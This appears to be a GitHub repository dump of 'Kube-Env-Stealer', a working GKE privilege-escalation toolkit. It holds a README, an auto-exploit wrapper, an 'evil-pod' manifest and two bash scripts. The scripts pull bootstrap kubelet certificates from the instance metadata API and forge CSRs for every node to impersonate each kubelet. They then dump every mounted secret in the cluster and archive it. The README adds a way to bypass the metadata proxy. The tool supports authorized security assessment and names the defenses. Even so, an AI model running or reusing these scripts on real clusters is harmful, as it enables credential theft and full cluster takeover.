├── .gitignore ├── README.md ├── auto-exploit.sh ├── compute.instances.get └── gce-gke-kubelet-csr-secret-extractor.sh ├── evil-pod.yaml └── gke-kubelet-csr-secret-extractor.sh /.gitignore: -------------------------------------------------------------------------------- 1 | *.swp 2 | cluster.tar 3 | 4 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Kube-Env-Stealer 2 | 3 | ## TL;DR 4 | 5 | If you can run a pod in GKE and the cluster isn't running [Metadata Concealment](https://cloud.google.com/kubernetes-engine/docs/how-to/protecting-cluster-metadata) or the newer implementation of [Workload Identity](https://cloud.google.com/kubernetes-engine/docs/how-to/workload-identity), you have a really good chance at becoming `cluster-admin` in under a minute. 6 | 7 | Also, this can be done with just `compute.instances.get` and access to that cluster's GKE API. See the variant in the `compute.instances.get` folder of this repo. 8 | 9 | DISCLAIMER: Only perform this on clusters you own and operate or are authorized to assess. This code is presented "as-is" without warranty fit for a particular purpose. Read the code and understand what it's doing before using. 10 | 11 | Steps for the in-GKE approach: 12 | 13 | - Clone this repo. 14 | - Thoroughly read the code and understand what it's doing first. 15 | - A working and configured `kubectl` pointed at the desired GKE cluster. 16 | - Ensure you have permissions to create a basic nginx pod. 17 | - Run `./auto-exploit.sh` 18 | - After 15-30 seconds, examine the contents of `cluster.tar`. 19 | - Leverage the service account token JWTs for service accounts with higher permissions via kubectl. 20 | 21 | Steps for the outside-of-GKE approach: 22 | 23 | - Clone this repo. 24 | - Thoroughly read the code and understand what it's doing first. 25 | - `gcloud curl awk sed grep base64 openssl kubectl` installed locally (no kubeconfig needed) 26 | - Use gcloud to obtain a gke worker node instance name, project, and zone/region. Typically need `compute.instances.list` for this. 27 | - Ensure you have the ability to access the GKE API of the cluster in that project via layer4 (no credentials needed). 28 | - `cd `compute.instances.get` 29 | - Run `./gce-gke-kubelet-csr-secret-extractor.sh` 30 | - After 15-30 seconds, examine the contents of current directory. 31 | - Leverage the service account token JWTs for service accounts with higher permissions via `kubectl --token`. 32 | 33 | ## Background 34 | 35 | GKE clusters with exposed `kube-env` attributes files via the metadata API URL are vulnerable to mass kubelet impersonation and cluster-wide secret extraction. In most cases, this will expose enough information with which to escalate privileges within the cluster to "cluster-admin" via service account tokens stored within secrets that have those permissions. Or, it may provide just enough permissions to run pods that mount the host filesystem and allow "escaping" to the underlying host. 36 | 37 | Accessing the `kube-env` file can occur via the UI/gcloud if the user has "compute.instances.get" IAM permissions or if the metadata API is not blocked from being accessed by pods. In practice, this is commonly accessible to many users in a GCP Project that aren't meant to be cluster "admins". 38 | 39 | Accessing the `kube-env` attributes attached to the GCE instances acting as GKE worker nodes via curl from inside a running pod: 40 | 41 | ```bash 42 | curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env 43 | ``` 44 | 45 | If you see the contents of a largish file with key value pairs, you're all set. If you receive a message that this endpoint has been concealed, the GKE Metadata Proxy is doing its job. 46 | 47 | The kubelet has certain special permissions needed in order to do its job. It can get/list all pods in all namespaces, and it can get a secret if it knows the exact name and if the secret is attached to a pod running on itself. Compromising one kubelet's credentials means a partial secret compromise. But, if all kubelets are compromised, every secret currently in use by any pod is exposed. 48 | 49 | The contents of `kube-env` are, among other things, the "bootstrap" certs needed for the kubelet to generate a keypair for the node. The permissions granted to these bootstrap certs allow it to submit a Certificate Signing Request (CSR) to the API Server and download/use the auto-approved certificates. So, with a little work, we can gain a valid set of certificates as that kubelet. The problem is, the secrets we are looking for might be attached to a pod on another node, and our kubelet will get a 403 Forbidden when trying to get its contents as kubelets can only "see" secrets for pods scheduled on themselves. So, if we can impersonate every kubelet in the cluster, we can iterate through and extract the secrets each kubelet can see. 50 | 51 | This is possible because: 1) the bootstrap `kube-env` certs are available without authentication via the metadata URL and 2) the `kube-env` certs allow one to generate a CSR for any hostname. Thus, simply knowing all the hostnames of the nodes in the cluster is sufficient to be able to generate a second, valid kubelet keypair for each node if we have one node's bootstrap certificates. As a nice bonus, the generation of a new keypair doesn't invalidate the keypair that the kubelet is using, so this process is non-disruptive. 52 | 53 | ## High-level Attack Steps 54 | 55 | Assuming we have the ability to run a pod on a GKE node not running [Metadata Concealment](https://cloud.google.com/kubernetes-engine/docs/how-to/protecting-cluster-metadata) or [Workload Identity](https://cloud.google.com/kubernetes-engine/docs/how-to/workload-identity), we can run a script inside a pod of our choosing that performs the following steps: 56 | 57 | - Verify we have the proper binaries used by this script 58 | - Download the `kube-env` from the metadata API URL 59 | - Source `kube-env` vars into our shell 60 | - Extract the bootstrap certificates from `kube-env` vars 61 | - Download the latest kubectl binary 62 | - Obtain the hostname of the current node (needed for the CSR) 63 | - Impersonate the local kubelet 64 | - Generate a openssl.cnf with this hostname inside 65 | - Generate a CSR file for this hostname 66 | - Generate a YAML object containing this CSR ready for 67 | submission to K8s for signing/approving 68 | - Submit the CSR YAML and retrieve the valid kubelet certificate 69 | for this hostname 70 | - Extract all the secrets that the kubelet can see for that 71 | hostname/node 72 | - Grab a full JSON listing of all Pod specs in all namespaces 73 | - Use the current kubelet's permissions to get the list of 74 | nodes in the cluster by name 75 | - Loop through all other nodes, impersonate each kubelet and 76 | extract all the secrets each kubelet can access. 77 | - Grab a concise listing of namespace, pod name, and secret name 78 | to make use of the secret contents easier. 79 | - Configure kubectl to use a ServiceAccount `token` JWT by passing in `--token eyJ...` to `kubectl` commands. 80 | 81 | ## Troubleshooting 82 | 83 | 1. If you or the script is unable to reach the `kube-env` endpoint on the Metadata API because the "endpoint has been concealed", your only option is to try modifying `evil-pod.yaml` to add `hostNetwork: true` so that the pod runs on the underlying node's network and bypasses the Metadata Proxy. 84 | 85 | ## Cleanup 86 | 87 | If you have `cluster-admin` permissions, you can _carefully_ list and delete the extra CSRs via kubectl. You can tell which ones to delete based on the date of creation. This is likely the only activity that is potentially dangerous to your cluster. It's also fine to leave them in-place. 88 | 89 | ## References 90 | 91 | Coincidentally, this "exploit" script was being worked on /the same week/ as [https://www.4armed.com/blog/hacking-kubelet-on-gke/](https://www.4armed.com/blog/hacking-kubelet-on-gke/) wrote this great write-up (right before KubeCon 2018 NA) unbeknownst to me. That said, I didn't want to release it immediately to allow for better GKE defaults/options to be available. Now that Workload Identity is available and deprecates/incorporates the Metadata Concealment Proxy and several months have passed, the prevention mechanisms are readily available. 92 | 93 | To see the more about real-world attacks that leveraged the metadata to escalate privileges inside a GKE cluster, watch [Shopify’s $25k Bug Report, and the Cluster Takeover That Didn’t Happen - Greg Castle and Shane Lawrence](https://www.youtube.com/watch?v=2XCm7vveU5A). 94 | -------------------------------------------------------------------------------- /auto-exploit.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | kubectl create -f evil-pod.yaml 4 | PODNAME=$(kubectl get pods -l run=evil -o=jsonpath='{.items[*].metadata.name}') 5 | kubectl wait deployment --timeout=60s --for condition=available -l run=evil 6 | kubectl cp gke-kubelet-csr-secret-extractor.sh $PODNAME:/root 7 | kubectl exec -it $PODNAME -- chmod +x /root/gke-kubelet-csr-secret-extractor.sh 8 | kubectl exec -it $PODNAME -- apt-get update 9 | kubectl exec -it $PODNAME -- apt-get install curl -y 10 | kubectl exec -it $PODNAME -- /bin/bash -c "cd /root; ./gke-kubelet-csr-secret-extractor.sh" 11 | kubectl exec -it $PODNAME -- /bin/bash -c "cd /root; tar -cf cluster.tar dumps secrets" 12 | if [[ ! -f cluster.tar ]]; then 13 | kubectl cp $PODNAME:/root/cluster.tar cluster.tar 14 | tar -tvf cluster.tar 15 | else 16 | echo "Local cluster.tar exists. Showing existing file" 17 | tar -tvf cluster.tar 18 | fi 19 | kubectl delete -f evil-pod.yaml 20 | -------------------------------------------------------------------------------- /compute.instances.get/gce-gke-kubelet-csr-secret-extractor.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | export KUBECONFIG="file" 4 | # Global vars 5 | BINARIES="gcloud curl awk sed grep base64 openssl kubectl" 6 | KUBE_ENV_URL="http://169.254.169.254/computeMetadata/v1/instance/attributes/kube-env" 7 | KUBE_ENV_FILE="kube-env" 8 | CA_CERT_PEM="ca.crt" 9 | KUBELET_BOOTSTRAP_CERT="kubelet-bootstrap.crt" 10 | KUBELET_BOOTSTRAP_KEY="kubelet-bootstrap.key" 11 | KUBE_HOSTNAME_URL="http://169.254.169.254/computeMetadata/v1/instance/hostname" 12 | CURRENT_HOSTNAME="" 13 | hexchars="0123456789ABCDEF" 14 | SUFFIX="$( for i in {1..4} ; do echo -n ${hexchars:$(( $RANDOM % 16 )):1} ; done )" 15 | OPENSSL_CNF="openssl.cnf" 16 | KUBELET_EC_KEY="kubelet.key" 17 | KUBELET_EC_CERT="kubelet.crt" 18 | KUBELET_CSR="kubelet.csr" 19 | KUBELET_CSR_YAML="kubelet-csr.yaml" 20 | ALL_NODE_NAMES="" 21 | NS_POD_SECRETS="ns-pod-secret-listing.txt" 22 | 23 | # Functions 24 | function print-status { 25 | echo "[[ ${@} ]]" 26 | } 27 | 28 | function check-binaries { 29 | # Ensure we have the needed binaries 30 | for binary in ${BINARIES}; do 31 | print-status "Checking if ${binary} exists" 32 | which ${binary} 2> /dev/null 1> /dev/null 33 | if [[ $? -ne 0 ]]; then 34 | echo "ERROR: Script requires ${binary}, but it was not found in the path. Aborting." 35 | exit 1 36 | fi 37 | done 38 | } 39 | 40 | function get-kube-env { 41 | # Obtain the kube-env via the metadata URL 42 | print-status "Obtain kube-env" 43 | # Only requires (compute.instances.list) or (compute.instances.get and knowledge of one GKE worker host name) in a project with a GKE cluster. roles/viewer is sufficient! 44 | gcloud compute instances describe --project "${1}" --zone "${3}" "${2}" --format=json | jq -r ".metadata.items[] | select(.key==\"kube-env\") | .value" | grep "^KUBELET_CERT:\|^KUBELET_KEY:\|^CA_CERT:\|^KUBERNETES_MASTER_NAME" | sed -e 's/: /=/g' > "${KUBE_ENV_FILE}" 45 | CURRENT_HOSTNAME="${1}" 46 | } 47 | 48 | function source-kube-env { 49 | print-status "Source kube-env" 50 | source "${KUBE_ENV_FILE}" 51 | rm -f "${KUBE_ENV_FILE}" 52 | } 53 | 54 | function get-bootstrap-certs { 55 | # Write the public CA cert, kubelet-bootstrap cert, and kubelet-bootstrap.key 56 | print-status "Get bootstrap certificate data" 57 | if [[ ! -d bootstrap ]]; then 58 | mkdir -p bootstrap 59 | fi 60 | if [[ "$(uname -s)" -eq 'Darwin' ]]; then 61 | echo "${CA_CERT}" | base64 -D > "bootstrap/${CA_CERT_PEM}" 62 | echo "${KUBELET_CERT}" | base64 -D > "bootstrap/${KUBELET_BOOTSTRAP_CERT}" 63 | echo "${KUBELET_KEY}" | base64 -D > "bootstrap/${KUBELET_BOOTSTRAP_KEY}" 64 | else 65 | echo "${CA_CERT}" | base64 -d > "bootstrap/${CA_CERT_PEM}" 66 | echo "${KUBELET_CERT}" | base64 -d > "bootstrap/${KUBELET_BOOTSTRAP_CERT}" 67 | echo "${KUBELET_KEY}" | base64 -d > "bootstrap/${KUBELET_BOOTSTRAP_KEY}" 68 | fi 69 | } 70 | 71 | function generate-openssl-cnf { 72 | # Generate a host-specific openssl.cnf for use with the CSR generation 73 | print-status "Create nodes/${1}/${OPENSSL_CNF}" 74 | cat << EOF > "nodes/${1}/${OPENSSL_CNF}" 75 | [ req ] 76 | prompt = no 77 | encrypt_key = no 78 | default_md = sha256 79 | distinguished_name = dname 80 | 81 | [ dname ] 82 | O = system:nodes 83 | CN = system:node:${1} 84 | EOF 85 | } 86 | 87 | function generate-ec-keypair { 88 | # Generate a per-host EC keypair 89 | print-status "Generate EC kubelet keypair for ${1}" 90 | if [ ! -f "nodes/${1}/${KUBELET_EC_KEY}" ]; then 91 | openssl ecparam -genkey -name prime256v1 -out "nodes/${1}/${KUBELET_EC_KEY}" 92 | fi 93 | } 94 | 95 | function generate-csr { 96 | # Genreate the CSR using the per-host openssl.cnf and EC keypair 97 | print-status "Generate CSR for ${1}" 98 | if [ ! -f "nodes/${1}/${KUBELET_CSR}" ]; then 99 | openssl req -new -config "nodes/${1}/${OPENSSL_CNF}" -key "nodes/${1}/${KUBELET_EC_KEY}" -out "nodes/${1}/${KUBELET_CSR}" 100 | fi 101 | } 102 | 103 | function generate-csr-yaml { 104 | # Prepare the CSR object for submission to K8s 105 | print-status "Generate CSR YAML for ${1}" 106 | cat < "nodes/${1}/${KUBELET_CSR_YAML}" 107 | apiVersion: certificates.k8s.io/v1beta1 108 | kind: CertificateSigningRequest 109 | metadata: 110 | name: node-csr-${1}-${SUFFIX} 111 | spec: 112 | groups: 113 | - system:authenticated 114 | request: $(cat nodes/${1}/${KUBELET_CSR} | base64 | tr -d '\n') 115 | usages: 116 | - digital signature 117 | - key encipherment 118 | - client auth 119 | username: kubelet 120 | EOF 121 | } 122 | 123 | function generate-certificate { 124 | # Submit the CSR object, wait a second, and then fetch the signed/approved certificate file 125 | print-status "Submit CSR and Generate Certificate for ${1}" 126 | kubectl create -f "nodes/${1}/${KUBELET_CSR_YAML}" --server="https://${KUBERNETES_MASTER_NAME}" --certificate-authority="bootstrap/${CA_CERT_PEM}" --client-certificate="bootstrap/${KUBELET_BOOTSTRAP_CERT}" --client-key="bootstrap/${KUBELET_BOOTSTRAP_KEY}" 127 | 128 | print-status "Sleep 2 while being approved" 129 | sleep 2 130 | 131 | print-status "Download approved Cert for ${1}" 132 | if [[ "$(uname -s)" -eq 'Darwin' ]]; then 133 | kubectl --server="https://${KUBERNETES_MASTER_NAME}" --certificate-authority="bootstrap/${CA_CERT_PEM}" --client-certificate="bootstrap/${KUBELET_BOOTSTRAP_CERT}" --client-key="bootstrap/${KUBELET_BOOTSTRAP_KEY}" get csr "node-csr-${1}-${SUFFIX}" -o jsonpath='{.status.certificate}' | base64 -D > "nodes/${1}/${KUBELET_EC_CERT}" 134 | else 135 | kubectl --server="https://${KUBERNETES_MASTER_NAME}" --certificate-authority="bootstrap/${CA_CERT_PEM}" --client-certificate="bootstrap/${KUBELET_BOOTSTRAP_CERT}" --client-key="bootstrap/${KUBELET_BOOTSTRAP_KEY}" get csr "node-csr-${1}-${SUFFIX}" -o jsonpath='{.status.certificate}' | base64 -d > "nodes/${1}/${KUBELET_EC_CERT}" 136 | fi 137 | } 138 | 139 | function dump-secrets { 140 | # Use the kubelet's permissions to dump the secrets it can access 141 | print-status "Dumping secrets mounted to ${1} into the 'secrets/' folder" 142 | if [[ ! -d secrets ]]; then 143 | mkdir -p secrets 144 | fi 145 | for i in $(kubectl --server="https://${KUBERNETES_MASTER_NAME}" --certificate-authority="bootstrap/${CA_CERT_PEM}" --client-certificate="nodes/${1}/${KUBELET_EC_CERT}" --client-key="nodes/${1}/${KUBELET_EC_KEY}" get pods --all-namespaces -o=jsonpath='{range .items[*]}{.metadata.namespace}{"|"}{.spec.volumes[*].secret.secretName}{"\n"}{end}' | sort -u); do 146 | NS=$(echo $i | awk -F\| '{print $1}') 147 | SECRET=$(echo $i | awk -F\| '{print $2}') 148 | if [[ ! -z "${SECRET}" ]]; then 149 | kubectl --server="https://${KUBERNETES_MASTER_NAME}" --certificate-authority="bootstrap/${CA_CERT_PEM}" --client-certificate="nodes/${1}/${KUBELET_EC_CERT}" --client-key="nodes/${1}/${KUBELET_EC_KEY}" -n "${NS}" get secret "${SECRET}" 2> /dev/null 1> /dev/null 150 | if [[ $? -eq 0 ]]; then 151 | echo "Exporting secrets/${NS}-${SECRET}.json" 152 | kubectl --server="https://${KUBERNETES_MASTER_NAME}" --certificate-authority="bootstrap/${CA_CERT_PEM}" --client-certificate="nodes/${1}/${KUBELET_EC_CERT}" --client-key="nodes/${1}/${KUBELET_EC_KEY}" -n "${NS}" get secret "${SECRET}" -o=json > "secrets/${NS}-${SECRET}.json" 153 | fi 154 | fi 155 | done 156 | } 157 | 158 | function get-pods-list { 159 | # Fetches a full pod listing to know which secrets are tied to which pods 160 | print-status "Download a full pod listing" 161 | kubectl --server="https://${KUBERNETES_MASTER_NAME}" --certificate-authority="bootstrap/${CA_CERT_PEM}" --client-certificate="nodes/${1}/${KUBELET_EC_CERT}" --client-key="nodes/${1}/${KUBELET_EC_KEY}" get pods --all-namespaces -o json > dumps/allpods.json 162 | } 163 | 164 | function get-nodes-list { 165 | # Fetch the listing of nodes in the cluster from K8s 166 | print-status "Get node names" 167 | ALL_NODE_NAMES="$(kubectl --server=https://${KUBERNETES_MASTER_NAME} --certificate-authority=bootstrap/${CA_CERT_PEM} --client-certificate=nodes/${1}/${KUBELET_EC_CERT} --client-key=nodes/${1}/${KUBELET_EC_KEY} get nodes -o=jsonpath='{.items[*].metadata.name}')" 168 | } 169 | 170 | function impersonate-kubelet { 171 | # All the steps to get per-node credentials and dump the secrets it can access 172 | if [[ ! -d nodes/${1} ]]; then 173 | mkdir -p nodes/${1} 174 | fi 175 | if [[ ! -d dumps ]]; then 176 | mkdir -p dumps 177 | fi 178 | generate-openssl-cnf "${1}" 179 | generate-ec-keypair "${1}" 180 | generate-csr "${1}" 181 | generate-csr-yaml "${1}" 182 | generate-certificate "${1}" 183 | dump-secrets "${1}" 184 | } 185 | 186 | function iterate-through-nodes { 187 | # Find and iterate through all the other nodes in the cluster 188 | print-status "Iterate through all other node names" 189 | for i in ${ALL_NODE_NAMES}; do 190 | if [[ "${i}" != "${1}" ]]; then 191 | impersonate-kubelet "${i}" 192 | fi 193 | done 194 | } 195 | 196 | function print-ns-pod-secrets { 197 | # Extracts and prints namespace, podname, and secret 198 | print-status "Extracting namespace, podname, and secret listing to the 'dumps/' folder" 199 | kubectl --server="https://${KUBERNETES_MASTER_NAME}" --certificate-authority="bootstrap/${CA_CERT_PEM}" --client-certificate="nodes/${1}/${KUBELET_EC_CERT}" --client-key="nodes/${1}/${KUBELET_EC_KEY}" get pods --all-namespaces -o=jsonpath='{range .items[*]}{.metadata.namespace}{"|"}{.metadata.name}{"|"}{.spec.volumes[*].secret.secretName}{"\n"}{end}' | sort -u > "dumps/${NS_POD_SECRETS}" 200 | } 201 | 202 | # usage 203 | if [ $# -ne 3 ]; then 204 | echo 1>&2 "Usage: $0 project-name gke-gce-instance-name zone-name" 205 | echo 1>&2 "e.g: $0 my-gke-project gke-clustername-nodepoolname-0c4e5f17-7rnv us-central1-a" 206 | echo 1>&2 "" 207 | echo 1>&2 "Note: Your gcloud must be authenticated to the correct project with 'compute.instances.get' permissions" 208 | exit 3 209 | fi 210 | # Logic begins here 211 | check-binaries 212 | get-kube-env ${1} ${2} ${3} 213 | source-kube-env 214 | get-bootstrap-certs 215 | impersonate-kubelet "${CURRENT_HOSTNAME}" 216 | get-pods-list "${CURRENT_HOSTNAME}" 217 | get-nodes-list "${CURRENT_HOSTNAME}" 218 | iterate-through-nodes "${CURRENT_HOSTNAME}" 219 | print-ns-pod-secrets "${CURRENT_HOSTNAME}" 220 | -------------------------------------------------------------------------------- /evil-pod.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1beta1 2 | kind: Deployment 3 | metadata: 4 | name: evil-pod 5 | spec: 6 | replicas: 1 7 | template: 8 | metadata: 9 | labels: 10 | run: evil 11 | spec: 12 | # If metadata proxy is running and you have no PSP 13 | # preventing this setting, uncomment to run on the 14 | # underlying node's network namespace to bypass it. 15 | # hostNetwork: true 16 | containers: 17 | - name: evil-pod 18 | image: nginx:latest 19 | -------------------------------------------------------------------------------- /gke-kubelet-csr-secret-extractor.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | # Global vars 4 | BINARIES="curl awk sed grep base64 openssl" 5 | KUBE_ENV_URL="http://169.254.169.254/computeMetadata/v1/instance/attributes/kube-env" 6 | KUBE_ENV_FILE="kube-env" 7 | CA_CERT_PEM="ca.crt" 8 | KUBELET_BOOTSTRAP_CERT="kubelet-bootstrap.crt" 9 | KUBELET_BOOTSTRAP_KEY="kubelet-bootstrap.key" 10 | KUBE_HOSTNAME_URL="http://169.254.169.254/computeMetadata/v1/instance/hostname" 11 | CURRENT_HOSTNAME="" 12 | hexchars="0123456789ABCDEF" 13 | SUFFIX="$( for i in {1..4} ; do echo -n ${hexchars:$(( $RANDOM % 16 )):1} ; done )" 14 | OPENSSL_CNF="openssl.cnf" 15 | KUBELET_EC_KEY="kubelet.key" 16 | KUBELET_EC_CERT="kubelet.crt" 17 | KUBELET_CSR="kubelet.csr" 18 | KUBELET_CSR_YAML="kubelet-csr.yaml" 19 | ALL_NODE_NAMES="" 20 | NS_POD_SECRETS="ns-pod-secret-listing.txt" 21 | 22 | # Functions 23 | function print-status { 24 | echo "[[ ${@} ]]" 25 | } 26 | 27 | function check-binaries { 28 | # Ensure we have the needed binaries 29 | for binary in ${BINARIES}; do 30 | print-status "Checking if ${binary} exists" 31 | which ${binary} 2> /dev/null 1> /dev/null 32 | if [[ $? -ne 0 ]]; then 33 | echo "ERROR: Script requires ${binary}, but it was not found in the path. Aborting." 34 | exit 1 35 | fi 36 | done 37 | } 38 | 39 | function get-kube-env { 40 | # Obtain the kube-env via the metadata URL 41 | print-status "Obtain kube-env" 42 | if [ ! -f "${KUBE_ENV_FILE}" ]; then 43 | # convert into bash formatted vars (three we don't need break formatting/escaping so we grep them out) 44 | curl -s -H "Metadata-flavor: Google" "${KUBE_ENV_URL}" | grep -v "EVICTION" | grep -v "KUBELET_TEST_ARGS" | grep -v "EXTRA_DOCKER_OPTS" | sed -e 's/: /=/g' > "${KUBE_ENV_FILE}" 45 | fi 46 | } 47 | 48 | function source-kube-env { 49 | print-status "Source kube-env" 50 | source "${KUBE_ENV_FILE}" 51 | } 52 | 53 | function get-bootstrap-certs { 54 | # Write the public CA cert, kubelet-bootstrap cert, and kubelet-bootstrap.key 55 | print-status "Get bootstrap certificate data" 56 | if [[ ! -d bootstrap ]]; then 57 | mkdir -p bootstrap 58 | fi 59 | echo "${CA_CERT}" | base64 -d > "bootstrap/${CA_CERT_PEM}" 60 | echo "${KUBELET_CERT}" | base64 -d > "bootstrap/${KUBELET_BOOTSTRAP_CERT}" 61 | echo "${KUBELET_KEY}" | base64 -d > "bootstrap/${KUBELET_BOOTSTRAP_KEY}" 62 | } 63 | 64 | function get-hostname { 65 | # Obtain the hostname via the metadata URL 66 | print-status "Obtain the Hostname" 67 | CURRENT_HOSTNAME="$(curl -s -H 'Metadata-flavor: Google' ${KUBE_HOSTNAME_URL} | awk -F. '{print $1}')" 68 | } 69 | 70 | function get-kubectl { 71 | # Fetch the latest kubectl binary if needed 72 | print-status "Get kubectl binary" 73 | if [ ! -f kubectl ]; then 74 | curl -s -LO https://storage.googleapis.com/kubernetes-release/release/$(curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt)/bin/linux/amd64/kubectl 75 | chmod +x kubectl 76 | fi 77 | } 78 | 79 | function generate-openssl-cnf { 80 | # Generate a host-specific openssl.cnf for use with the CSR generation 81 | print-status "Create nodes/${1}/${OPENSSL_CNF}" 82 | cat << EOF > "nodes/${1}/${OPENSSL_CNF}" 83 | [ req ] 84 | prompt = no 85 | encrypt_key = no 86 | default_md = sha256 87 | distinguished_name = dname 88 | 89 | [ dname ] 90 | O = system:nodes 91 | CN = system:node:${1} 92 | EOF 93 | } 94 | 95 | function generate-ec-keypair { 96 | # Generate a per-host EC keypair 97 | print-status "Generate EC kubelet keypair for ${1}" 98 | if [ ! -f "nodes/${1}/${KUBELET_EC_KEY}" ]; then 99 | openssl ecparam -genkey -name prime256v1 -out "nodes/${1}/${KUBELET_EC_KEY}" 100 | fi 101 | } 102 | 103 | function generate-csr { 104 | # Genreate the CSR using the per-host openssl.cnf and EC keypair 105 | print-status "Generate CSR for ${1}" 106 | if [ ! -f "nodes/${1}/${KUBELET_CSR}" ]; then 107 | openssl req -new -config "nodes/${1}/${OPENSSL_CNF}" -key "nodes/${1}/${KUBELET_EC_KEY}" -out "nodes/${1}/${KUBELET_CSR}" 108 | fi 109 | } 110 | 111 | function generate-csr-yaml { 112 | # Prepare the CSR object for submission to K8s 113 | print-status "Generate CSR YAML for ${1}" 114 | cat < "nodes/${1}/${KUBELET_CSR_YAML}" 115 | apiVersion: certificates.k8s.io/v1beta1 116 | kind: CertificateSigningRequest 117 | metadata: 118 | name: node-csr-${1}-${SUFFIX} 119 | spec: 120 | groups: 121 | - system:authenticated 122 | request: $(cat nodes/${1}/${KUBELET_CSR} | base64 | tr -d '\n') 123 | usages: 124 | - digital signature 125 | - key encipherment 126 | - client auth 127 | username: kubelet 128 | EOF 129 | } 130 | 131 | function generate-certificate { 132 | # Submit the CSR object, wait a second, and then fetch the signed/approved certificate file 133 | print-status "Submit CSR and Generate Certificate for ${1}" 134 | ./kubectl create -f "nodes/${1}/${KUBELET_CSR_YAML}" --server="https://${KUBERNETES_MASTER_NAME}" --certificate-authority="bootstrap/${CA_CERT_PEM}" --client-certificate="bootstrap/${KUBELET_BOOTSTRAP_CERT}" --client-key="bootstrap/${KUBELET_BOOTSTRAP_KEY}" 135 | 136 | print-status "Sleep 2 while being approved" 137 | sleep 2 138 | 139 | print-status "Download approved Cert for ${1}" 140 | ./kubectl --server="https://${KUBERNETES_MASTER_NAME}" --certificate-authority="bootstrap/${CA_CERT_PEM}" --client-certificate="bootstrap/${KUBELET_BOOTSTRAP_CERT}" --client-key="bootstrap/${KUBELET_BOOTSTRAP_KEY}" get csr "node-csr-${1}-${SUFFIX}" -o jsonpath='{.status.certificate}' | base64 -d > "nodes/${1}/${KUBELET_EC_CERT}" 141 | 142 | } 143 | 144 | function dump-secrets { 145 | # Use the kubelet's permissions to dump the secrets it can access 146 | print-status "Dumping secrets mounted to ${1}" 147 | if [[ ! -d secrets ]]; then 148 | mkdir -p secrets 149 | fi 150 | for i in $(./kubectl --server="https://${KUBERNETES_MASTER_NAME}" --certificate-authority="bootstrap/${CA_CERT_PEM}" --client-certificate="nodes/${1}/${KUBELET_EC_CERT}" --client-key="nodes/${1}/${KUBELET_EC_KEY}" get pods --all-namespaces -o=jsonpath='{range .items[*]}{.metadata.namespace}{"|"}{.spec.volumes[*].secret.secretName}{"\n"}{end}' | sort -u); do 151 | NS=$(echo $i | awk -F\| '{print $1}') 152 | SECRET=$(echo $i | awk -F\| '{print $2}') 153 | if [[ ! -z "${SECRET}" ]]; then 154 | ./kubectl --server="https://${KUBERNETES_MASTER_NAME}" --certificate-authority="bootstrap/${CA_CERT_PEM}" --client-certificate="nodes/${1}/${KUBELET_EC_CERT}" --client-key="nodes/${1}/${KUBELET_EC_KEY}" -n "${NS}" get secret "${SECRET}" 2> /dev/null 1> /dev/null 155 | if [[ $? -eq 0 ]]; then 156 | echo "Exporting secrets/${NS}-${SECRET}.json" 157 | ./kubectl --server="https://${KUBERNETES_MASTER_NAME}" --certificate-authority="bootstrap/${CA_CERT_PEM}" --client-certificate="nodes/${1}/${KUBELET_EC_CERT}" --client-key="nodes/${1}/${KUBELET_EC_KEY}" -n "${NS}" get secret "${SECRET}" -o=json > "secrets/${NS}-${SECRET}.json" 158 | fi 159 | fi 160 | done 161 | } 162 | 163 | function get-pods-list { 164 | # Fetches a full pod listing to know which secrets are tied to which pods 165 | print-status "Download a full pod listing" 166 | ./kubectl --server="https://${KUBERNETES_MASTER_NAME}" --certificate-authority="bootstrap/${CA_CERT_PEM}" --client-certificate="nodes/${1}/${KUBELET_EC_CERT}" --client-key="nodes/${1}/${KUBELET_EC_KEY}" get pods --all-namespaces -o json > dumps/allpods.json 167 | } 168 | 169 | function get-nodes-list { 170 | # Fetch the listing of nodes in the cluster from K8s 171 | print-status "Get node names" 172 | ALL_NODE_NAMES="$(./kubectl --server=https://${KUBERNETES_MASTER_NAME} --certificate-authority=bootstrap/${CA_CERT_PEM} --client-certificate=nodes/${1}/${KUBELET_EC_CERT} --client-key=nodes/${1}/${KUBELET_EC_KEY} get nodes -o=jsonpath='{.items[*].metadata.name}')" 173 | } 174 | 175 | function impersonate-kubelet { 176 | # All the steps to get per-node credentials and dump the secrets it can access 177 | if [[ ! -d nodes/${1} ]]; then 178 | mkdir -p nodes/${1} 179 | fi 180 | if [[ ! -d dumps ]]; then 181 | mkdir -p dumps 182 | fi 183 | generate-openssl-cnf "${1}" 184 | generate-ec-keypair "${1}" 185 | generate-csr "${1}" 186 | generate-csr-yaml "${1}" 187 | generate-certificate "${1}" 188 | dump-secrets "${1}" 189 | } 190 | 191 | function iterate-through-nodes { 192 | # Find and iterate through all the other nodes in the cluster 193 | print-status "Iterate through all other node names" 194 | for i in ${ALL_NODE_NAMES}; do 195 | if [[ "${i}" != "${1}" ]]; then 196 | impersonate-kubelet "${i}" 197 | fi 198 | done 199 | } 200 | 201 | function print-ns-pod-secrets { 202 | # Extracts and prints namespace, podname, and secret 203 | print-status "Extracting namespace, podname, and secret listing" 204 | ./kubectl --server="https://${KUBERNETES_MASTER_NAME}" --certificate-authority="bootstrap/${CA_CERT_PEM}" --client-certificate="nodes/${1}/${KUBELET_EC_CERT}" --client-key="nodes/${1}/${KUBELET_EC_KEY}" get pods --all-namespaces -o=jsonpath='{range .items[*]}{.metadata.namespace}{"|"}{.metadata.name}{"|"}{.spec.volumes[*].secret.secretName}{"\n"}{end}' | sort -u > "dumps/${NS_POD_SECRETS}" 205 | } 206 | 207 | # Logic begins here 208 | check-binaries 209 | get-kube-env 210 | source-kube-env 211 | get-bootstrap-certs 212 | get-kubectl 213 | get-hostname 214 | impersonate-kubelet "${CURRENT_HOSTNAME}" 215 | get-pods-list "${CURRENT_HOSTNAME}" 216 | get-nodes-list "${CURRENT_HOSTNAME}" 217 | iterate-through-nodes "${CURRENT_HOSTNAME}" 218 | print-ns-pod-secrets "${CURRENT_HOSTNAME}" 219 | --------------------------------------------------------------------------------